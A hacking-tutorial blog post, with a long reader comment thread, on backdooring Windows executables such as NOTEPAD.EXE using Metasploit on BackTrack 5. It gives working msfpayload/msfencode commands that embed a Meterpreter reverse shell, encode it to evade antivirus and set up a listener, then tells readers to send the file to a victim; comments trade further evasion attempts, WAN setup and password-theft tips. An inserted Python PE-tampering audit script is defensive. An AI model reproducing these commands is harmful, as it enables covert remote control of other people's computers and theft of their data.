How to Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 Simple Steps

Have you ever imagined that when you click and open your Notepad application, it contains a backdoor or malicious code? Or that when you start your Windows OS it also starts the explorer.exe process, but this explorer.exe contains a backdoor or malicious code? Embedding a backdoor into EXE files isn't hard at all; in fact it's very easy. Follow the tutorial below to see for yourself that I'm right about how easy it is :p LoL
You will need:
1. Metasploit Framework 3 (or Metasploit v2)
2. A Linux OS (or BackTrack 5, which already includes the Metasploit Framework inside the operating system)
1. First of all, prepare your target EXE file. In this case I will use NOTEPAD.EXE.
2. Next, use msfpayload to generate a Meterpreter reverse TCP payload and pipe it into msfencode, which injects it into our executable (NOTEPAD.EXE), encodes it 5 times (5 iterations) with shikata_ga_nai and saves the backdoored file on the Desktop (the whole command below is a single line).
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
3. Because we selected a reverse Meterpreter payload, we need to set up the exploit handler to receive the connection back to our attacking machine, which in this case has the IP address 192.168.8.92. Start the Metasploit console by typing msfconsole, then run:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
Don't forget to change LHOST to your own IP address and LPORT to your desired local port.
4. The next step is to send our special NOTEPAD.EXE file to the victim; as soon as they download and open it, there is a Meterpreter shell on the victim's computer:
PWNED
You can also learn how to apply this method to attack over the internet, but please read my previous tutorial about the logic of attacking a network outside the LAN (attacking over WAN) first. Hope it's useful for you. Any comments or corrections? Please drop a comment below.
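From the defender's side, the thing to check after reading the steps above is whether a system executable such as notepad.exe is still the file it claims to be. The following is an added example, not part of the original tutorial and not Metasploit's own code: a small Python audit that hashes a PE file against a known-good SHA-256 baseline and parses its section table to flag the kinds of anomaly a template-injected binary tends to show (a section that is both writable and executable, section contents with near-random entropy, an entry point that has been moved into the last section). The two PE images it inspects are constructed inside the script so it runs offline; the names build_pe, audit_pe, the ".extra" section and the baseline dictionary are all assumptions of this example rather than anything from the page.

```python
import hashlib
import math
import struct

# IMAGE_SCN_* section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_sections(data):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE image (PE32 or PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # same offset in PE32 and PE32+
    table = opt + opt_size
    sections = []
    for i in range(num_sections):
        off = table + i * 40
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append(dict(name=name.rstrip(b"\0").decode("ascii", "replace"), vsize=vsize,
                             vaddr=vaddr, rawsize=rawsize, rawptr=rawptr, chars=chars))
    return entry_rva, sections


def shannon_entropy(buf):
    """Bits per byte: 8.0 is uniformly random; compiled code is normally well under 7."""
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def audit_pe(name, data, baseline):
    """Return a list of human-readable findings; an empty list means nothing looked wrong."""
    findings = []
    digest = hashlib.sha256(data).hexdigest()
    if name not in baseline:
        findings.append("no baseline hash recorded for %s" % name)
    elif baseline[name] != digest:
        findings.append("hash mismatch against baseline: sha256=%s" % digest)
    entry, sections = parse_sections(data)
    entry_section = None
    for s in sections:
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append("section %s is writable and executable" % s["name"])
        if s["rawptr"] + s["rawsize"] > len(data):
            findings.append("section %s raw data runs past end of file" % s["name"])
            continue
        raw = data[s["rawptr"]:s["rawptr"] + s["rawsize"]][:s["vsize"]]
        if len(raw) >= 64 and shannon_entropy(raw) > 7.0:
            findings.append("section %s has high entropy %.2f (packed or encoded data)"
                            % (s["name"], shannon_entropy(raw)))
        if s["vaddr"] <= entry < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            entry_section = s
    if entry_section is None:
        findings.append("entry point 0x%x lies outside every section" % entry)
    elif not entry_section["chars"] & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE):
        findings.append("entry point 0x%x is in non-code section %s" % (entry, entry_section["name"]))
    elif len(sections) > 1 and entry_section is sections[-1]:
        findings.append("entry point 0x%x is in the last section %s, typical of appended code"
                        % (entry, entry_section["name"]))
    return findings


def build_pe(sections, entry_rva):
    """Constructed minimal PE32 image for this demo; header fields the audit ignores stay zero."""
    opt_size = 224
    headers_len = 64 + 4 + 20 + opt_size + 40 * len(sections)
    first_raw = -(-headers_len // 512) * 512  # section data starts at the next 512-byte boundary
    table, blobs, raw_ptr, vaddr = b"", b"", first_raw, 0x1000
    for name, payload, chars in sections:
        rawsize = -(-len(payload) // 512) * 512
        table += struct.pack("<8sIIIIIIHHI", name, len(payload), vaddr, rawsize, raw_ptr, 0, 0, 0, 0, chars)
        blobs += payload.ljust(rawsize, b"\0")
        raw_ptr += rawsize
        vaddr += 0x1000
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva).ljust(opt_size, b"\0")
    return (dos + b"PE\0\0" + coff + opt + table).ljust(first_raw, b"\0") + blobs


CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
TEXT = b"\x55\x8b\xec" + b"\x90" * 200 + b"\xc3"  # push ebp; mov ebp,esp; nops; ret
# Constructed, deterministic high-entropy filler standing in for an encoded stub (not real shellcode).
FILLER = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(32))

CLEAN_IMAGE = build_pe([(b".text", TEXT, CODE), (b".data", b"\0" * 100, DATA)], 0x1000)
TAMPERED_IMAGE = build_pe([(b".text", TEXT, CODE), (b".data", b"\0" * 100, DATA),
                           (b".extra", FILLER, CODE | IMAGE_SCN_MEM_WRITE)], 0x3000)
BASELINE = {"notepad.exe": hashlib.sha256(CLEAN_IMAGE).hexdigest()}  # taken from a trusted copy

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_IMAGE), ("tampered", TAMPERED_IMAGE)):
        print(label, audit_pe("notepad.exe", image, BASELINE) or ["ok"])
```

For a real file, call audit_pe with the bytes read from disk and a baseline of SHA-256 digests recorded from a trusted install; the hash check alone catches any modification, and the section heuristics explain what kind of modification it was. A file that is not a PE at all (for example an empty file renamed to notepad.exe, which is what some of the comments below ran msfencode against) makes parse_sections raise ValueError instead of returning findings.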
I cannot make it… my result looks like this:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: No such file or directory – /root/Desktop/NOTEPAD.EXE
[-] No encoders succeeded.
#Tarish
Did you already put the original NOTEPAD.EXE on your desktop?
Try notepad.exe instead of NOTEPAD.EXE.
Hello sir, I am Umesh Sharma from India.
1. Sir, I have read all your articles on Metasploit/BackTrack 5 with VMware Workstation about ethical hacking, on how to control an outside network like my friend's network having a different local IP address and a different public IP address, and I have gained lots of knowledge from these articles. I have also tried this trick on my friends' computers running Windows XP with the knowledge of my friends; I have already told my friends about this matter.
2. Now sir, I want to discuss the problems I faced during this operation, and I hope, sir, you will solve my problems.
3. I have used these commands for generating the payload.exe file:
(i) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 X > /root/payload.exe
(This generates the payload.exe file in my root directory, but it shows as a virus, detected by Kaspersky, Avira, AVG, Quick Heal and so many other antiviruses.)
(And then for connecting) I have used these parameters:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ” my local ip address ”
set LPORT 4444
exploit
(It's not working. I mean to say that when I opened the payload.exe file on my friend's computer, no sending stage came and no meterpreter session opened.) I used a pendrive to copy the payload.exe file to my friend's computer, because there is a problem sending this file with Gmail, Yahoo, Facebook, eBuddy messenger and other sites as this file contains a virus, and I also removed the installed antivirus on my friend's computer and turned off the firewall detection. I also changed the extension of the file from .exe to another extension when sending this file using internet sites, but the result is the same: it doesn't work and shows the virus.
(ii) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 X > /root/payload.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ” my public ip address ”
set LPORT 4444
exploit
(shows the same problem as written above)
(iii) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
>msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
>msfencode -e x86/countdown -c 2 -t exe | \
>msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
>msfencode -x /root/notepad.exe -e x86/call4_dword_xor -t exe -c 5 -o notepad2.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ” my local ip address ”
set LPORT 4444
exploit
(shows the same problem as written above)
(iv) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
>msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
>msfencode -e x86/countdown -c 2 -t exe | \
>msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
>msfencode -x /root/notepad.exe -e x86/call4_dword_xor -t exe -c 5 -o notepad2.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ” my public ip address ”
set LPORT 4444
exploit
(shows the same problem as written above)
(v) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
>msfencode -t exe -x /root/putty.exe -e x86/shikata_ga_nai -c 5 -o putty_backdoor.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ” my local ip address ”
set LPORT 4444
exploit
(shows the same problem as written above)
But when I work on a local area network, e.g. in a cafe, then it works, but the problem of virus detection is the same.
Sir, my questions are:
Does this procedure work on WAN or LAN?
Can the problem of virus detection be removed or not?
If the problem of virus detection can be removed, then please tell me how it can be removed.
How does this procedure work on WAN? I mean to say, how can I open a meterpreter session on my PC when I open the payload.exe file on my friend's network or friend's PC having a different public IP address?
(NOTE: During this operation my firewall was also disabled.)
#Umesh Kumar Sharma
Before you go to the WAN, you need to know the characteristics of a network that is "unmanageable" by you. This network is usually set up and configured by your ISP or internet provider. Most internet service providers will flag packets that come to an unknown port as malicious and drop them. You need to know which ports are allowed and which are not. That's why in the example I use port 80 or 443 for both the exploit and the payload.
Sir, thanks for the reply.
But sir, the problem of virus detection remains a problem. Sir, please tell me how the virus in the payload.exe file can be removed. I have used all the commands you have given, but the problem of virus detection remains a problem. Sir, please give a particular solution for this problem.
#umesh
Virus detection is like a never-ending story. Once you "only find" the exploit on the internet, just wait for hours or days, then the antivirus companies will shut it down. You can find many tutorials about how to create your own exploit.
Thanks.. now it's working fine..
Can you explain how to hack a remote PC with Metasploit or SET? I have never hacked a remote PC: although I installed a backdoor, my BackTrack 5 machine would not get any incoming connection from the remote machine. I am using VMware Workstation.. please explain this matter..
Waiting for your better tutorial… thanks..
#tarish
I wrote tons of that kind of content on my blog…. see the Tutorial section.
Can I open the victim's computer again after I shut down, without sending him anything?
#mehdi
You can view this tutorial http://www.hacking-tutorial.com/computer/5-steps-to-set-up-backdoor-after-successfully-compromising-target-using-backtrack-5/
Asswhole, fucking scams!!!!
THIS CONNECTS TO HIS IP!! AND THEN LET'S HIM ACCESS YOUR PC! I AM GONNA SCREW UP YOUR IP!! ASSWHOLE AND THIS SITE IS GOING DOWN!!!
^
The above poster is so lame.
On another note, notepad2.exe just dies when I try to open it on the victim (test) Windows machine with "program stopped working". Do you know why?
#tester
Maybe he just started learning about computer security.
Yep, just ignore it.
Are you using Windows 7 as your victim? If so, maybe the Win 7 DEP and ASLR prevent it from working. You can try it on Windows XP.
Hey, I managed to exploit my XP computer! I want to try it on a Win7 computer (x64)… is it possible? Any help, any idea plzz
#alpha
I haven't tried it on Win7 x64, but maybe it has a different infrastructure from x86…
Hey, thanks for the quick reply!
Have you done it on Win 7 32-bit (x86)? Does it work on it, or does it simply refuse to work on Win7? What do you think about Vista?
#alpha
No, it can't on Windows 7; it has DEP to prevent exploit execution.. it works on Windows XP.
I realized that the session dies after the victim closes our backdoor file, in this case Notepad,
and the victim's AV Norton 360 shows an alert that this file is not safe to run.
Any ways to solve those problems?
And I couldn't use your provided code; I'm facing "no encoder found" and blah blah errors with that.
I use this, which I found on some blogs:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=5610 R | /pentest/exploits/framework3/msfencode -t exe -x /root/Desktop/notepad.exe -k -o /root/Desktop/calc_backdoor.exe -e x86/shikata_ga_nai -c 5
Any guides? Solutions?
Oh, I forgot: thanks in advance.
Awesome blog and articles mate , keep it up
When the exploit is run it displays "Handler failed to bind to (ip address)". Why is that?
-DeusIgni
Also, when the flash drive containing NOTEPAD2.EXE is opened on the target, the system deletes it because it has been identified as a trojan virus. Is there any way possible to overcome this without turning off the antivirus or having the target download the file? -DeusIgni
#Deuslgni
Yep, that's true, it's detected by antivirus… but my purpose here was the logic of how to create a backdoor…
Which was very astute tutorial, thank you for that.
-DeusIgni
this is my problem:
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: Offset 0 outside of image source
[-] No encoders succeeded.
What is meant by "offset 0 outside of image source"?
Hi. I want to encode virus.exe. When I use msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/virus.exe -o /root/Desktop/virus2.exe it doesn't work. I don't get the encrypted file. Can you help me?
#alex
Did the iterations already finish, or was there some error message? The file should be placed on your desktop.
Hi.
After I double-click the file notepad2.exe on Win XP, it doesn't respond at all.
Below is the console message:
———————————–
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.77.128:443
[*] Starting the payload handler…
————————————-
What should I do? I am using VMware Workstation to run BT5 and Win XP.
#xuan
Did you already set your LHOST to the BT IP address?
Do you have any firewall/Windows Firewall on your XP machine?
Antivirus can find my backdoor, why??????
#love bt
Sure, of course they will find it; you need to learn how to hide it.
FYI: your AV database is updated automatically almost every 2 days, so you need to think of a new method + possibility.
Is shikata_ga_nai the best encoder to use? I have heard that avoid_utf8_tolower might be a bit better?
#jbone
Actually the encoding's purpose is to hide the backdoor from AV; but nowadays they're smart enough to identify malicious files with their specific algorithms, so to find out which one is better, maybe you can check whether it is detected by AV or not.
Hi v4L, and thanks for this tutorial, it's very useful.
I have a question:
What do I need to execute this payload from a remote PC not in my network (like a RAT)?
I tried this:
I forwarded port 443 on my router and set it to 192.168.1.4 (my BackTrack PC)
and set LHOST to my static IP (212.61.*.*)
and executed it from a remote PC (its IP is 78.93.*.*),
but Metasploit does not bind.
When I set LHOST=192.168.1.4
it binds 192.168.1.4:443,
but it stays looooong and no sessions are opened.
Please help me.
Is this way correct?
Thanks
#adigapro
When you set LHOST to your public IP and it forwards the port 443 packets to your local network, did your BT receive something? If it receives some interaction, then it's already connected.
How can I hack a target with a WAN IP?
#mouh
see this post : http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Dude, don't be so rude when someone asks for help, cause you ain't creating it; if anyone just sees this tutorial, remember IoXx told you how.
This makes it and encodes it:
msfpayload windows/meterpreter/reverse_tcp lhost=x.x.189.146 LPORT=443 X > /root/Desktop/NOTEPAD.EXE R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
and makes it remote.
By the way, I ain't stupid, I put a random IP there as an example.
#loxx
Only a stupid guy tells others "I'm a good guy" when no one is asking.
LoL
Maybe your neighbours in Windermere can teach you not to do st*pid things.
this is my problem as well:
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: Offset 0 outside of image source
[-] No encoders succeeded.
The error is: offset 0 outside of image source
How do I fix it??
Thanks
#cybersho
No idea, maybe others here?
Hi sir, please tell me, is there any way to create a session with Windows 7 without opening file.exe on Windows 7?
#irfan
You can look at the other tutorials here: http://www.hacking-tutorial.com/category/hacking-tutorial/
I could not find any suitable tutorial in this article. Please give me any other guideline about Windows 7 hacking, without opening a file.exe made by any trojan. I want to session hijack Windows 7.
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: No such file or directory – /root/Desktop/notepad.exe
[-] No encoders succeeded.
……. Now what??? I am on BackTrack 5 R2….
Thank you anyway…. solved it.
Which IP should I use to try to connect to my virtual machine?
I did ifconfig -a and I got the vmnet8 inet addr as 192.168.131.1, but when I tried to use it, I didn't get a connection.
#nick
You need to use a bridged connection for your virtual machine.
Can I get a screenshot from the victim's PC and get passwords from the victim's PC?
#shakil
yes, http://www.hacking-tutorial.com/tips-and-trick/5-steps-to-screen-capture-victim-screen-using-metasploit-meterpreter/
Hi buddy,
First I want to thank you for the help you have provided on your website about Metasploit. It has helped me a lot.
I have tried all the encoders multiple times in different ways. Most antiviruses are able to detect the payload.
Do you know how to encrypt the payload and then decrypt it so that the antivirus is unable to read the encrypted payload?
Thanks in advance.
Hello, I have created two blank files on the desktop, notepad.exe and notepad2.exe; when I encode them I get the following error:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -t exe -x Desktop/notepad.exe -k -o Desktop/notepad2.exe -c x86shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: Offset 0 outside of image source
[*] php/base64 succeeded with size 526 (iteration=1)
[*] php/base64 succeeded with size 724 (iteration=2)
[*] php/base64 succeeded with size 989 (iteration=3)
[*] php/base64 succeeded with size 1342 (iteration=4)
[*] php/base64 succeeded with size 1813 (iteration=5)
[-] php/base64 failed: Offset 0 outside of image source
[*] cmd/generic_sh succeeded with size 290 (iteration=1)
[*] cmd/generic_sh succeeded with size 290 (iteration=2)
[*] cmd/generic_sh succeeded with size 290 (iteration=3)
[*] cmd/generic_sh succeeded with size 290 (iteration=4)
[*] cmd/generic_sh succeeded with size 290 (iteration=5)
[-] cmd/generic_sh failed: Offset 0 outside of image source
[*] sparc/longxor_tag succeeded with size 344 (iteration=1)
[*] sparc/longxor_tag succeeded with size 396 (iteration=2)
[*] sparc/longxor_tag succeeded with size 448 (iteration=3)
[*] sparc/longxor_tag succeeded with size 500 (iteration=4)
[*] sparc/longxor_tag succeeded with size 552 (iteration=5)
[-] sparc/longxor_tag failed: Offset 0 outside of image source
[-] mipsbe/longxor failed: wrong constant name #
[-] mipsle/longxor failed: wrong constant name #
[*] x86/fnstenv_mov succeeded with size 314 (iteration=1)
[*] x86/fnstenv_mov succeeded with size 338 (iteration=2)
[*] x86/fnstenv_mov succeeded with size 362 (iteration=3)
[*] x86/fnstenv_mov succeeded with size 386 (iteration=4)
[*] x86/fnstenv_mov succeeded with size 410 (iteration=5)
[-] x86/fnstenv_mov failed: Offset 0 outside of image source
[*] ppc/longxor succeeded with size 368 (iteration=1)
[*] ppc/longxor succeeded with size 444 (iteration=2)
[*] ppc/longxor succeeded with size 520 (iteration=3)
[*] ppc/longxor succeeded with size 596 (iteration=4)
[*] ppc/longxor succeeded with size 672 (iteration=5)
[-] ppc/longxor failed: Offset 0 outside of image source
[*] ppc/longxor_tag succeeded with size 364 (iteration=1)
[*] ppc/longxor_tag succeeded with size 436 (iteration=2)
[*] ppc/longxor_tag succeeded with size 508 (iteration=3)
[*] ppc/longxor_tag succeeded with size 580 (iteration=4)
[*] ppc/longxor_tag succeeded with size 652 (iteration=5)
[-] ppc/longxor_tag failed: Offset 0 outside of image source
[*] generic/none succeeded with size 290 (iteration=1)
[*] generic/none succeeded with size 290 (iteration=2)
[*] generic/none succeeded with size 290 (iteration=3)
[*] generic/none succeeded with size 290 (iteration=4)
[*] generic/none succeeded with size 290 (iteration=5)
[-] generic/none failed: Offset 0 outside of image source
[*] x64/xor succeeded with size 335 (iteration=1)
[*] x64/xor succeeded with size 375 (iteration=2)
[*] x64/xor succeeded with size 415 (iteration=3)
[*] x64/xor succeeded with size 455 (iteration=4)
[*] x64/xor succeeded with size 495 (iteration=5)
[-] x64/xor failed: Offset 0 outside of image source
[*] x86/call4_dword_xor succeeded with size 316 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 340 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 364 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 388 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 412 (iteration=5)
[-] x86/call4_dword_xor failed: Offset 0 outside of image source
[*] x86/jmp_call_additive succeeded with size 321 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 353 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 385 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 417 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 449 (iteration=5)
[-] x86/jmp_call_additive failed: Offset 0 outside of image source
[*] x86/countdown succeeded with size 308 (iteration=1)
[*] x86/countdown succeeded with size 326 (iteration=2)
[*] x86/countdown succeeded with size 344 (iteration=3)
[*] x86/countdown succeeded with size 362 (iteration=4)
[*] x86/countdown succeeded with size 380 (iteration=5)
[-] x86/countdown failed: Offset 0 outside of image source
[*] x86/nonalpha succeeded with size 410 (iteration=1)
[-] x86/nonalpha failed: BadChar
[-] x86/nonupper failed: Encoding failed due to a nil character
[*] x86/alpha_upper succeeded with size 649 (iteration=1)
[*] x86/alpha_upper succeeded with size 1367 (iteration=2)
[*] x86/alpha_upper succeeded with size 2802 (iteration=3)
[*] x86/alpha_upper succeeded with size 5673 (iteration=4)
[*] x86/alpha_upper succeeded with size 11414 (iteration=5)
[-] x86/alpha_upper failed: Offset 0 outside of image source
[*] cmd/ifs succeeded with size 325 (iteration=1)
[*] cmd/ifs succeeded with size 325 (iteration=2)
[*] cmd/ifs succeeded with size 325 (iteration=3)
[*] cmd/ifs succeeded with size 325 (iteration=4)
[*] cmd/ifs succeeded with size 325 (iteration=5)
[-] cmd/ifs failed: Offset 0 outside of image source
[*] x86/alpha_mixed succeeded with size 641 (iteration=1)
[*] x86/alpha_mixed succeeded with size 1344 (iteration=2)
[*] x86/alpha_mixed succeeded with size 2749 (iteration=3)
[*] x86/alpha_mixed succeeded with size 5559 (iteration=4)
[*] x86/alpha_mixed succeeded with size 11179 (iteration=5)
[-] x86/alpha_mixed failed: Offset 0 outside of image source
/opt/metasploit/msf3/modules/encoders/x86/avoid_utf8_tolower.rb:146:in `decoder_stub’: The payload being encoded is of an incompatible size (73 bytes) from /opt/metasploit/msf3/lib/msf/core/encoder.rb:287:in `do_encode’
from /opt/metasploit/msf3/lib/msf/core/encoder.rb:271:in `encode’
from /opt/metasploit/msf3/msfencode:250:in `block (2 levels) in ‘
from /opt/metasploit/msf3/msfencode:247:in `upto’
from /opt/metasploit/msf3/msfencode:247:in `block in ‘
from /opt/metasploit/msf3/msfencode:237:in `each’
from /opt/metasploit/msf3/msfencode:237:in `’
Any help?
thanks
#rhys
Try removing the -k in your command.
Thanks for the quick reply, but no luck. I don't know what's wrong, although is it acceptable to put 2 blank files on the desktop (right click > create blank file) and rename one to notepad.exe and the other to notepad2.exe?
#rhys
No, you can't; or maybe you can try updating your Metasploit Framework (run msfupdate).
Still no luck. What two exe files should I create on the desktop? Thanks
What two files should be put on the desktop and where should I get them from? Also the update made no change. Just some more information: I am running BackTrack 5 R3 GNOME 64-bit installed to the hard drive.
#rhys
Ah, you use 64-bit; try changing the x86 to x64shikata_ga_nai.
Sorry, no luck. What files should I put on the desktop? You have used notepad.exe and notepad2.exe, but where do you get these files and what is the criterion for choosing them? Thank you for persevering, I really appreciate it.
#rhys
It's the notepad.exe I got from c:\windows\system32; when I try another exe I can still encode it without error. :/?
Solved it. I had to do the following: allow executing the file as a program, remove -k and set it to x64. The program I used was Notepad++ from http://notepad-plus-plus.org/download/v6.3.html and tada. You sir have a regular follower,
thank you
When I run exploit for the payload, the message shows like this:
exploit
started reverse handler ip:lport
started payload handler
killed
After this message my process stops.
Is this a problem with the network connection?
Is this a problem with the firewall being on?
But it should be noted that my network and the victim's network are OK and my firewall is off.
If there is any other suggestion then please give it to me, thank you.
The payload.exe file is still detected by antivirus after using all the commands.
I have also worked on Windows files like "clbcatq.dll" and "wuauclt.exe", but it (payload.exe) is still detected by antivirus.
I have also made my own exploit, but the problem is still a problem.
Give your suggestion.
The problem of virus detection is not removed.
I have also removed the unwanted characters/bad chars/null bytes '\x00\xff\xa1', something like that, from the payload.exe file, but it is still detected by antivirus.
How can this problem be removed?
#umesh
I already told you in my last comment.
"Create your own exploit"… if you download or use an exploit from the internet (the free ones) or from Metasploit (free), the probability of it being detected by antivirus is 99%, and the 1% success is for zero-days.
If you want an instant one you can buy the exploit on 1337day.com.
There is no permanent way to remove this virus by the use of encoders; if the encoders are not working, then why are these encoders given in Metasploit?
#umesh

That's why we need to learn.
Let's say you're a good person; can you think how many bad people out there also use this encoder?
You got the tutorial on how to hide an exploit from antivirus from the internet; do you think the antivirus companies will just sit down and relax without upgrading their systems while they read the same tutorial?
Be realistic.
That's why I noted in my last comment, if you want the instant one, then you can buy it without doing the research.
Hi, this is in regards to injecting an exe into a custom PE like notepad.exe. The problem I face is that when we create an exe and inject it into notepad.exe using the -k option and try opening it on the Windows platform, the blank Notepad opens up and then the shellcode is executed. Now I want to know whether there is a way the shellcode can be executed without Notepad opening up.
I have also removed the bad characters or null characters '\x00\xff\xa1' and the like by using the various encoders, but the problem of virus detection remains a problem. I have also worked on the 'clbcatq.dll' and 'wuauclt.exe' Windows files, but the problem of virus detection remains a problem.
How can the virus be removed?
I think the virus cannot be removed because BackTrack or Linux is a backdoor testing machine, not for virus removal.
If you have any other suggestion please give it.
Vishnu, I would like you to please help me out in regards to the problem I posted in my earlier post. Your help will be highly solicited.
Nice blog post, but now this backdoor is detected ;[.
I found another video about backdoors, hope you like it. There are lots of videos but I am only interested in creating backdoors. Have a look if you like this video http://goo.gl/XlwJX
#Abhijith
Thanks for sharing
When I run exploit for the payload, the message shows like this:
exploit
started reverse handler ip:lport
started payload handler
killed
After this message "killed" my process stops.
Is this a problem with the network connection?
Is this a problem with the firewall being on?
But it should be noted that my network and the victim's network are OK and my firewall is off.
If there is any other suggestion then please give it to me, thank you.
Hello, I am getting this error. Could you please help, as it would be much appreciated.
Thank You
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: Offset 0 outside of image source
[-] No encoders succeeded.